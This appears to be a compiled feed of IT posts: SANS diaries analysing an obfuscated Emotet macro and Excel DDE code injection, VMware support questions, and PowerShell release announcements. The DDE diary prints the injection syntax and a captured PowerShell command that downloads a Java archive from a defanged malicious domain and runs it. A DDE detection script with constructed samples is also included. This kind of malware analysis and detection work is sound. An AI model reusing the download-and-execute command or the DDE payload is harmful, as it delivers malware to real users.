When DOSfuscation Helps…, (Sun, Sep 30th)

This post was originally published on this site

An anonymous reader submitted a malicious document after Brad posted his diary entry “One Emotet infection leads to three follow-up malware infections“.

This sample (MD5 dfff3a02e6e6a4d079c12f83dcc2f7a5) is a malicious Word document with VBA macros to launch a PowerShell command.

The command is “DOSfuscated“, and when I analyzed it by extracting strings and concatenating them, I encountered a small problem.

In this video, you can see how I did the complete analysis:

 

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

More Excel DDE Code Injection, (Fri, Sep 28th)

The “DDE code injection” technique is not brand new. DDE stands for “Dynamic Data Exchange”[1]. It has already been discussed by many security researchers[2]. Just a quick reminder for those who missed it. In Excel, it is possible to trigger the execution of an external command by using the following syntax:

=cmd|'arguments'!cell

While some malicious Excel files were spotted recently, yesterday I found a bunch of files all related to the same campaign. The interesting fact is that all those files have a VT score of 0! Indeed, they contain a lot of junk strings and, in the middle of them, a DDE injection:

$ head -10 24711ad4f13bde4451ebac2a2f2a5c7406f048f6b56dc1ec868d7f2da5cc8c98.vir




lljecTcCsRfkqsBfL2ud7yg1Eeeb
KZiUlYv8rqf52TeMTPvmoOPxhmFYrInZMo897D
tWgf38B1VjbL2Rp4LXyCuaDbcAk9wuSuA3PLjDmXSmIaTb6ZxEcswmHSTRXo6Fl54NRVLl7onJMgJOnxGWXayUq
GgHUNdPiWdihpKxfhuQJetYn2CpxVWUzIQZwONaVYOwQ1pvP
RsrzZKKq1GjBhFzkzXQhs9i3A5Jvb46HdNyEqpMVJtlljecTcCsRfkqsBfL2ud7yg1EeebNrKZi
Yv8rqf52TeMTPvmoOPxhmFYrInZMo897DtjtWgf38B1VjbL

By default, Excel will consider any file not recognized as a valid sheet as CSV and will open it as is.

Here is the command executed:

powershell -executionpolicy bypass -W Hidden -command "& { (new-object System.Net.WebClient).DownloadFile("hxxp://topehagepa[.]online" ," %temp%WJJWBHVFUG.jar") }" & %temp%WJJWBHVFUG.jar’

I’m using a YARA rule to catch them on VirusTotal and I already found some samples and related domain names.
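
The pattern described above (junk lines with one DDE formula buried among them) can be hunted with a small scanner. The following Python sketch is an added example, not the author's YARA rule or any code from the original post; the sample lines are constructed, and the function and field names are hypothetical.

```python
import re
from dataclasses import dataclass

# A spreadsheet evaluates a cell as a formula when it starts with =, +, - or @.
# A DDE reference inside such a cell has the form  application|'topic'!item .
# The quoted topic may itself contain commas, so the line is matched as a
# whole instead of being split into CSV fields first.
DDE_RE = re.compile(
    r"""(?:^|[,;\t])\s*"?\s*           # start of a cell, optional opening quote
        [=+\-@]                         # formula trigger character
        [^,;\t]*?                       # anything before the reference
        (?P<app>[A-Za-z][\w.\\/:-]*)    # application (DDE service name)
        \s*\|\s*
        (?P<topic>'[^']*'|[^!,;\t'"]+)  # topic: the arguments, usually quoted
        \s*!\s*
        (?P<item>'[^']*'|[\w$.]+)       # item: a cell reference or a name
    """,
    re.VERBOSE,
)

# Assumption: only the two interpreters named on this page are flagged.
SHELL_NAMES = {"cmd", "powershell"}


@dataclass
class Finding:
    line_no: int
    app: str
    topic: str
    item: str
    launches_shell: bool


def _basename(app: str) -> str:
    """Reduce 'C:\\Windows\\System32\\cmd.exe' to 'cmd'."""
    name = re.split(r"[\\/]", app)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def scan_text(text: str) -> list:
    """Return one Finding per DDE reference found in formula cells."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in DDE_RE.finditer(line):
            findings.append(Finding(
                line_no=line_no,
                app=m.group("app"),
                topic=m.group("topic").strip("'"),
                item=m.group("item").strip("'"),
                launches_shell=_basename(m.group("app")) in SHELL_NAMES,
            ))
    return findings


# Constructed sample: junk lines, a harmless DDE formula, ordinary CSV rows,
# and a quoted cell that hides the reference behind a SUM() expression.
SAMPLE = "\n".join([
    "Qx7LmZp0RtYvB3nKd9Wc",
    "hT5uJe2PaSgF8oXiM1rCzNqVyLbD",
    "=cmd|'/c echo constructed-sample'!A1",
    "name,qty,total",
    "widget,3,=SUM(B2:B3)",
    "gadget,-2,\"@SUM(1+1)*powershell|'-NoProfile -Command Write-Output constructed'!A0\"",
])

if __name__ == "__main__":
    for f in scan_text(SAMPLE):
        flag = "SHELL" if f.launches_shell else "dde"
        print(f"line {f.line_no}: [{flag}] {f.app} -> {f.topic!r} (item {f.item})")
```

Ordinary formulas such as `=SUM(B2:B3)` and negative numbers are not reported, because the match requires the `|` and `!` separators of a DDE reference.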

SHA256 of samples:

Domain names:

All the domains resolve to the same IP address: 54.36.212.133 (located at OVH in France) but the server is down at the moment. The downloaded file being a Java archive, there are chances that it’s a classic Trojan. Has anybody successfully gotten access to these files? I’d be happy to have a look at them.

[1] https://docs.microsoft.com/en-us/windows/desktop/dataxchg/dynamic-data-exchange
[2] https://blog.reversinglabs.com/blog/cvs-dde-exploits-and-obfuscation

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Adding more cores to a VMClient : Feature ‘Hot-Pluggable virtual HW’ is not licensed with this edition

I am trying to add more cores to a VM client running on  the following HP Server and I am getting the following error:

 

Feature ‘Hot-Pluggable virtual HW’ is not licensed with this edition.

 

What do I need to purchase in order to add more cores?  The server has 1 CPU and 6 cores?

 

Product: VMware vSphere 6 Hypervisor Licensed for 1 physical CPUs (unlimited cores per CPU)
License Key: H129K-0UL9L-28Y88-XXXX-XXXX
Expires: Never

Product Features:
    Up to 8-way virtual SMP

 

Reconfiguration fails on standalone with vim.fault.NoPermission during registry access

The relevant fragment of the worker log appears to be as below.  What could this be caused by?  Is there a possible workaround / solution?

—————–

 

2018-09-13T23:46:00.234+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Starting system reconfiguration …

2018-09-13T23:46:00.234+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=Default] Using temp dir C:WINDOWSTEMPvmware-tempvmware-SYSTEMsysReconfig

2018-09-13T23:46:00.281+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] ReconfigurationTransaction: cached guest system volume

2018-09-13T23:46:00.281+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] ReconfigurationTransaction: cached guest system volume

2018-09-13T23:46:00.281+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] LocalPathToGuestSystemFolder: .vstor2-mntapi20-shared-8C73F4D0000010000000000005000000WINDOWS

2018-09-13T23:46:00.281+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] LocalUndoFolder: .vstor2-mntapi20-shared-8C73F4D0000010000000000005000000WINDOWS$Reconfig$

2018-09-13T23:46:00.828+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=Default] [LoadTempHive] Registry hive .vstor2-mntapi20-shared-8C73F4D0000010000000000005000000WINDOWSsystem32configSYSTEM is loaded under the name mntApi233162130830690227

2018-09-13T23:46:02.109+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=Default] [LoadTempHive] Registry hive .vstor2-mntapi20-shared-8C73F4D0000010000000000005000000WINDOWSsystem32configSOFTWARE is loaded under the name mntApi233646505830690227

2018-09-13T23:46:02.109+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Populating predefined expressions …

2018-09-13T23:46:02.109+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Processing user-defined expressions …

2018-09-13T23:46:02.109+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Evaluating registry expression, Key = CurrentControlSetServicesACPIValueName StartValueType 1 dataPattern 0

2018-09-13T23:46:02.109+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Evaluating registry expression, Key = MicrosoftWindows NTCurrentVersionValueName CurrentTypeValueType 0 dataPattern Multiprocessor.*

2018-09-13T23:46:02.125+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Evaluating registry expression, Key = CurrentControlSetControlCriticalDeviceDatabaseprimary_ide_channelValueName ServiceValueType 0 dataPattern atapi

2018-09-13T23:46:02.125+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Evaluating registry expression, Key = CurrentControlSetControlCriticalDeviceDatabasesecondary_ide_channelValueName ServiceValueType 0 dataPattern atapi

2018-09-13T23:46:02.125+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Applying reconfigurations …

2018-09-13T23:46:02.156+01:00 error vmware-converter-worker[05116] [Originator@6876 sub=task-3] Error 2 (opening key) saving registry key mntApi233162130830690227ControlSet001Servicesrhelfltr into .vstor2-mntapi20-shared-8C73F4D0000010000000000005000000WINDOWS$Reconfig$mntApi233162130830690227-ControlSet001-Services-rhelfltr-reg

2018-09-13T23:46:02.250+01:00 error vmware-converter-worker[05116] [Originator@6876 sub=task-3] Error 5 (error restoring key: Access is denied (5)) restoring registry key C:Program FilesVMwareVMware vCenter Converter StandalonedataSKUNKWORKS_FILLER into mntApi233162130830690227ControlSet001Servicesrhelfltr

2018-09-13T23:46:02.250+01:00 error vmware-converter-worker[05116] [Originator@6876 sub=task-3] Reconfiguration failed with: vim.fault.NoPermission

2018-09-13T23:46:02.250+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Rolling back the reconfiguration transaction…

2018-09-13T23:46:02.250+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Deleting pending files…

2018-09-13T23:46:02.250+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=task-3] Writing the undo log …

2018-09-13T23:46:02.328+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=Default] Unloaded hive mntApi233646505830690227

2018-09-13T23:46:02.359+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=Default] Unloaded hive mntApi233162130830690227

2018-09-13T23:46:02.359+01:00 info vmware-converter-worker[05116] [Originator@6876 sub=Default] Cleaning up temp directory C:WINDOWSTEMPvmware-tempvmware-SYSTEMsysReconfig …

2018-09-13T23:46:02.359+01:00 error vmware-converter-worker[05116] [Originator@6876 sub=task-3] TaskImpl has failed with MethodFault::Exception: converter.fault.ReconfigurationFault

2018-09-13T23:46:02.359+01:00 error vmware-converter-worker[05116] [Originator@6876 sub=Default] Task failed:

Announcing PowerShell Core 6.1

We’re proud to announce that the latest version of PowerShell has been released! This marks our second supported release of PowerShell Core, the open-source edition of PowerShell that works on Linux, macOS, and Windows!

By far, the biggest feature of this release is compatibility of built-in Windows modules with PowerShell Core. This means that you can natively run those modules/cmdlets with PowerShell Core and easily transition from Windows PowerShell.

Thanks to everyone that made this release possible, including our contributors, users, and anyone who filed issues and submitted feedback.

Just give me the bits!

For info on installing PowerShell Core 6.1, check out our installation docs.

What’s new?

We’ve released a slew of new features in 6.1, including:

  • Compatibility with 1900+ existing cmdlets in Windows 10 and Windows Server 2019
  • Built on top of .NET Core 2.1
  • Support for the latest versions of Windows, macOS, and Linux (see below)
  • Significant performance improvements
  • Markdown cmdlets
  • Experimental feature flags

For a more in-depth look at what’s included, take a look at our release notes, or for a complete list of changes, check out our CHANGELOG on GitHub.

Operating system support

You can always find an up-to-date list of supported operating systems and PowerShell Core versions at https://aka.ms/pslifecycle.

On release, PowerShell Core 6.1 supports:

  • Windows 7/8.1/10
  • Windows Server 2008R2/2012/2012R2/2016 (and 2019 on release)
  • Windows Server Semi-Annual Channel (SAC)
  • macOS 10.12+
  • Ubuntu 14.04/16.04/18.04
  • Debian 8.7+/9
  • CentOS 7
  • Red Hat Enterprise Linux (RHEL) 7
  • OpenSUSE 42.3
  • Fedora 27/28

Platforms with unofficial “community” support also include:

  • Ubuntu 18.10
  • Arch Linux
  • Raspbian (ARM32)
  • Kali Linux
  • Alpine (experimental Docker image coming soon)

How can I provide feedback?

As always, you can file issues on GitHub to let us know about any features you’d like added or bugs that you encounter. Additionally, you can join us for the PowerShell Community Call on the 3rd Thursday of every month. The Community Call is a great opportunity to talk directly to the team, hear about the latest developments in PowerShell, and to voice your opinions into ongoing feature design.

Of course, we’re always looking for contributions that make PowerShell better. We love when our community helps out with code contributions, but you don’t have to be a rockstar developer to make a difference in PowerShell, as we’re also happy to accept test and documentation contributions as well.

Thanks, and enjoy PowerShell 6.1!

Joey Aiello
Program Manager, PowerShell

New Look and Features for PowerShell Gallery

The PowerShell Gallery and PowerShellGet have just been updated to provide new features, performance improvements, and a new modern design.  

NOTE: This post has important information for publishers in the “Accounts and publishing” section. 

PowerShell Gallery Home Page

The PowerShell Gallery is the place to find PowerShell code that is shared by the community, Microsoft, and other companies. The site has averaged over 21 million downloads per month for the past 6 months, and has more than 3,800 unique packages available for use. It’s amazing when we consider we were handling just under 4 million downloads in July 2017. We clearly needed to invest in the PowerShell Gallery to support that kind of growth.

We have been working for some time to improve the performance of the PowerShell Gallery. The result is now available to everyone, and includes new features, performance enhancements, security improvements to accounts and publishing keys, and better alignment with the NuGet.org codebase that we rely on for our service and cmdlets.

New features and performance enhancements

Most users should see an improvement in package download speeds from the PowerShell Gallery. The new release takes advantage of CDN to provide faster downloads, particularly for those outside the United States. This should be most noticeable when installing a module with many dependencies.  

The new updates include things users have requested for a long time, including:

  • A manual download option from the PowerShell Gallery. It cannot replace install-module / install-script, but does solve some specific issues for those with private repositories or older versions of PowerShell.
  • A change to Install-Module and Install-Script to simply install to the current user scope when not running in an elevated PowerShell session.

The new user experience is more than just a face-lift, as providing a modern UI also improves the performance. The PowerShell Gallery pages now display only the most critical information initially, and move the details to expanding sections in the UI. This makes the pages faster and easier for users to find the content they want to see.

Accounts and publishing improvements

The changes with the most immediate impact in this release are for publishers and users with PowerShell Gallery accounts.   

Most important: Publishers must update to PowerShellGet module version 1.6.8 or higher to publish to the PowerShell Gallery. Older versions of PowerShellGet are fine for find, save, install, and update functions, but not for publishing.    

The PowerShell Gallery implemented several security best practices:

  • New API keys you create will have an expiration that ranges from 1 to 365 days.
  • We will not show the value of an API key in the UI, and the value must be copied immediately after creating or regenerating it.
  • Multiple API keys can be created, and defined for specific uses – such as only being available to publish packages with specific names.
  • Your existing API key will still work, and will be listed as a “Full access API key”. However, you will not be able to view the current API key value or refresh it. If you lose the key value, you will need to create a new key that has an expiration date.

These changes are explained in more detail in the PowerShell Gallery documentation, and are the most significant changes included in this release.

Account management in the PowerShell Gallery is also improved, and adds support for:

  • Two factor authentication for accessing the PowerShell Gallery account. This is a security best practice and is highly recommended.
  • Changing the email address or login account associated with their PowerShell Gallery ID

You can find out more about the new Account settings features here.

Aligning with NuGet

The previous versions of PowerShell Gallery and PowerShellGet were based on older versions of NuGet. With this change we are aligning much more closely with the current state of the NuGet server and client. Many of the changes listed above – including the account and API key management – came directly from the NuGet updates. Another feature NuGet implemented is the ability for publishers to delete a package they have published accidentally, within the first hour after publishing.

As we move closer to alignment with how NuGet.org works, we expect to provide new features that are available from the NuGet team. Other changes we are considering that are available today at NuGet.org include support for namespaces and organizational accounts.

Let us know what you think

If you have any feedback on the changes we have made, or future changes we should consider, please do let us know. Visit https://aka.ms/PowerShellGalleryIssues to review what others are saying, or to let us know of other things we should be looking into.

 

ESXi 6.0 U3 installation stuck on enter root password page

Hi, while installing a custom-made ESXi 6.0 image onto an HP ProLiant DL380 Gen 10 server, I am stuck on the enter root password page.

My logical disk is shown in the remote section and not in local. I can still choose the remote location, and pressing enter takes me to set the root password.

This is where I am stuck: I try to enter a password in the root section, but as soon as I hit seven characters it says password mismatch, even though I have not entered a password in the confirm password section.

Pressing the enter key does not seem to work here, but I can still press back (F9) and the ESC key.

Not sure what the problem is.

The custom image consists of the ESXi 6.0.0 offline bundle and contains this driver VIB package from the HP website found below:

Drivers & Software – HPE Support Center.

DSC Resource Kit Release September 2018

We just released the DSC Resource Kit!

This release includes updates to 11 DSC resource modules. In the past 6 weeks, 146 pull requests have been merged and 105 issues have been closed, all thanks to our amazing community!

The modules updated in this release are:

  • CertificateDsc
  • NetworkingDsc
  • SecurityPolicyDsc
  • SharePointDsc
  • SqlServerDsc
  • StorageDsc
  • xActiveDirectory
  • xDatabase
  • xExchange
  • xRemoteDesktopSessionHost
  • xWebAdministration

For a detailed list of the resource modules and fixes in this release, see the Included in this Release section below.

Our last community call for the DSC Resource Kit was on August 29. A recording of our updates will be available on YouTube soon. Join us for the next call at 12PM (Pacific time) on October 10 to ask questions and give feedback about your experience with the DSC Resource Kit.

The next DSC Resource Kit release will be going out one week later than usual on Wednesday, October 24, 2018. This will not shift any other dates, so the community call will still be on October 10, and the following release will be on November 28.

We strongly encourage you to update to the newest version of all modules using the PowerShell Gallery, and don’t forget to give us your feedback in the comments below, on GitHub, or on Twitter (@PowerShell_Team)!

Please see our documentation here for information on the support of these resource modules.

Included in this Release

You can see a detailed summary of all changes included in this release in the table below. For past release notes, go to the README.md or CHANGELOG.md file on the GitHub repository page for a specific module (see the How to Find DSC Resource Modules on GitHub section below for details on finding the GitHub page for a specific module).

Module Name Version Release Notes
CertificateDsc 4.2.0.0
  • Added a CODE_OF_CONDUCT.md with the same content as in the README.md – fixes Issue 139.
  • Refactored module folder structure to move resource to root folder of repository and remove test harness – fixes Issue 142.
  • Updated Examples to support deployment to PowerShell Gallery scripts.
  • Correct configuration names in Examples – fixes Issue 150.
  • Correct filename case of CertificateDsc.Common.psm1 – fixes Issue 149.
  • Remove exclusion of all tags in appveyor.yml, so all common tests can be run if opt-in.
  • PfxImport:
    • Added requirements to README.MD to specify cryptographic algorithm support – fixes Issue 153.
    • Changed Path parameter to be optional to fix error when ensuring certificate is absent and certificate file does not exist on disk – fixes Issue 136.
    • Removed ShouldProcess because it is not required by DSC Resources.
    • Minor style corrections.
    • Changed unit tests to be non-destructive.
    • Improved naming and description of example files.
    • Added localization string ID suffix for all strings.
  • Added .VSCode settings for applying DSC PSSA rules – fixes Issue 157.
NetworkingDsc 6.1.0.0
  • MSFT_Firewall:
    • Added full stop to end of MOF field descriptions.
    • Support for [, ] and * characters in the Name property added – fixes Issue 348.
    • Improved unit tests to meet style guidelines.
SecurityPolicyDsc 2.5.0.0
  • Added handler for null value in SecurityOption
  • Moved the helper module out from DSCResource folder to the Modules folder.
  • Fixed SecurityPolicyResourceHelper.Tests.ps1 so it is possible to run the tests locally.
  • Fixed minor typos.
SharePointDsc 2.5.0.0
  • SPAppCatalog
    • Updated resource to retrieve the Farm account instead of requiring it to be specifically used
  • SPDatabaseAAG
    • Updated readme.md to specify that this resource also updates the database connection string
  • SPDiagnosticsProvider
    • Fixed issue where enabling providers did not work
  • SPFarm
    • Added ability to check and update CentralAdministrationPort
  • SPLogLevel
    • Added High as TraceLevel, which was not included yet
  • SPRemoteFarmTrust
    • Updated readme.md file to add a link that was lost during earlier updates
  • SPSearchServiceApp
    • Updated Set method to check if service application pool exists. Resource will throw an error if it does not exist
  • SPSearchTopology
    • Fixed issue where Get method threw an error when the specified service application didn’t exist yet
    • Fixed issue where the resource would fail if the FQDN was specified
  • SPShellAdmins
    • Added ExcludeDatabases parameter for AllDatabases
  • SPSite
    • Added ability to check and update QuotaTemplate, OwnerAlias and SecondaryOwnerAlias
  • SPSiteUrl
    • New resource to manage site collection urls for host named site collections
  • SPTrustedIdentityTokenIssuerProviderRealm
    • Fixed issue where Get method threw an error when the realm didn’t exist yet
  • SPUserProfileServiceApp
    • Fix for issue where an update conflict error was thrown when new service application was created
    • Added SiteNamingConflictResolution parameter to the resource
SqlServerDsc 12.0.0.0
  • Changes to SqlServerDatabaseMail
    • DisplayName is now properly treated as display name for the originating email address (issue 1200). Nick Reilingh (@NReilingh)
      • DisplayName property now defaults to email address instead of server name.
      • Minor improvements to documentation.
  • Changes to SqlAGDatabase
  • Changes to SqlDatabaseOwner
    • BREAKING CHANGE: Support multiple instances on the same node. The parameter InstanceName is now Key and cannot be omitted (issue 1197).
  • Changes to SqlSetup
    • Added new parameters to allow defining the startup types for the Sql Engine service, the Agent service, the Analysis service and the Integration Service. The new optional parameters are respectively SqlSvcStartupType, AgtSvcStartupType, AsSvcStartupType, IsSvcStartupType and RsSvcStartupType (issue 1165). Maxime Daniou (@mdaniou)
StorageDsc 4.1.0.0
  • Enabled PSSA rule violations to fail build – Fixes Issue 149.
  • Fixed markdown rule violations in CHANGELOG.MD.
  • Disk:
    • Corrected message strings.
    • Added message when partition resize required but AllowDestructive parameter is not enabled.
    • Fix error when Size not specified and AllowDestructive is $true and partition can be expanded – Fixes Issue 162.
    • Fix incorrect error displaying when newly created partition is not made Read/Write.
    • Change verbose messages to show warnings when a partition resize would have occurred but the AllowDestructive flag is set to $false.
xActiveDirectory 2.21.0.0
xDatabase 1.9.0.0
  • xDatabase Test-TargetResource will now check DacPacVersion if DacPacPath parameter and DB exist. If the DacPacApplicationVersion is supplied and matches the deployed version we will return $true. (issue 41)
xExchange 1.23.0.0
  • Fixes issue with xExchMaintenanceMode on Exchange 2016 where the cluster does not get paused when going into maintenance mode. Also fixes issue where services fail to stop, start, pause, or resume.
  • Explicitly cast member types in Get-DscConfiguration return hashtables to align with the types defined in the resource schemas. Fixes an issue where Get-DscConfiguration fails to return a value.
  • xExchClientAccessServer: Fixes issue where AlternateServiceAccountConfiguration or RemoveAlternateServiceAccountCredentials parameters can’t be used at the same time as other optional parameters.
  • xExchInstall: Fixes issue where Test-TargetResource returns true if setup is running. Fixes issue where setup is not detected as having been successfully completed even if setup was successful. Adds initial set of unit tests for xExchInstall and related functions.
  • Remove VerbosePreference from function parameters and update all calls to changed functions.
  • Fixes multiple PSScriptAnalyzer issues. Specifically, fixes all instances of PSAvoidTrailingWhitespace, PSAvoidGlobalVars, PSAvoidUsingConvertToSecureStringWithPlainText, PSUseSingularNouns, and fixes many instances of PSUseDeclaredVarsMoreThanAssignments.
  • Add support for Exchange Server 2019 – Preview
xRemoteDesktopSessionHost 1.8.0.0
  • Changes to xRDSessionDeployment
    • Fixed issue where an initial deployment failed due to a convert to lowercase (issue 39).
    • Added unit tests to test Get, Test and Set results in this resource.
  • Change to xRDRemoteApp
    • Fixed issue where this resource ignored the CollectionName provided in the parameters (issue 41).
    • Changed key values in schema.mof to only Alias and CollectionName, DisplayName and FilePath are not key values.
    • Added Ensure property (Absent or Present) to enable removal of RemoteApps.
    • Added unit tests to test Get, Test and Set results in this resource.
xWebAdministration 2.2.0.0
  • Added new parameter “Location” to WebApplicationHandler extending functionality to address [392]
  • Changes to xWebAdministration
    • Update section header for WebApplicationHandler in README.
    • Fix tests for helper function Get-LocalizedData in Helper.Tests.ps1 that referenced the wrong path.
  • Remove duplication in MSFT_xWebsite.psm1. Krzysztof Morcinek (@kmorcinek)
  • Updates xIISMimeTypeMapping to add MIME type mapping for nested paths

How to Find Released DSC Resource Modules

To see a list of all released DSC Resource Kit modules, go to the PowerShell Gallery and display all modules tagged as DSCResourceKit. You can also enter a module’s name in the search box in the upper right corner of the PowerShell Gallery to find a specific module.

Of course, you can also always use PowerShellGet (available starting in WMF 5.0) to find modules with DSC Resources:

# To list all modules that are tagged as DSCResourceKit
Find-Module -Tag DSCResourceKit 
# To list all DSC resources from all sources 
Find-DscResource

Please note only those modules released by the PowerShell Team are currently considered part of the ‘DSC Resource Kit’ regardless of the presence of the ‘DSC Resource Kit’ tag in the PowerShell Gallery.

To find a specific module, go directly to its URL on the PowerShell Gallery:
http://www.powershellgallery.com/packages/< module name >
For example:
http://www.powershellgallery.com/packages/xWebAdministration

How to Install DSC Resource Modules From the PowerShell Gallery

We recommend that you use PowerShellGet to install DSC resource modules:

Install-Module -Name < module name >

For example:

Install-Module -Name xWebAdministration

To update all previously installed modules at once, open an elevated PowerShell prompt and use this command:

Update-Module

After installing modules, you can discover all DSC resources available to your local system with this command:

Get-DscResource

How to Find DSC Resource Modules on GitHub

All resource modules in the DSC Resource Kit are available open-source on GitHub.
You can see the most recent state of a resource module by visiting its GitHub page at:
https://github.com/PowerShell/< module name >
For example, for the CertificateDsc module, go to:
https://github.com/PowerShell/CertificateDsc.

All DSC modules are also listed as submodules of the DscResources repository in the DscResources folder and the xDscResources folder.

How to Contribute

You are more than welcome to contribute to the development of the DSC Resource Kit! There are several different ways you can help. You can create new DSC resources or modules, add test automation, improve documentation, fix existing issues, or open new ones.
See our contributing guide for more info on how to become a DSC Resource Kit contributor.

If you would like to help, please take a look at the list of open issues for the DscResources repository.
You can also check issues for specific resource modules by going to:
https://github.com/PowerShell/< module name >/issues
For example:
https://github.com/PowerShell/xPSDesiredStateConfiguration/issues

Your help in developing the DSC Resource Kit is invaluable to us!

Questions, comments?

If you’re looking into using PowerShell DSC, have questions or issues with a current resource, or would like a new resource, let us know in the comments below, on Twitter (@PowerShell_Team), or by creating an issue on GitHub.

Katie Keim
Software Engineer
PowerShell DSC Team
@katiedsc (Twitter)
@kwirkykat (GitHub)

What is Malware

Malware is software–a computer program–used to perform malicious actions. In fact, the term malware is a combination of the words malicious and software. Cyber criminals install malware on your computers or devices to gain control over them or gain access to what they contain. Once installed, these attackers can use malware to spy on your online activities, steal your passwords and files, or use your system to attack others.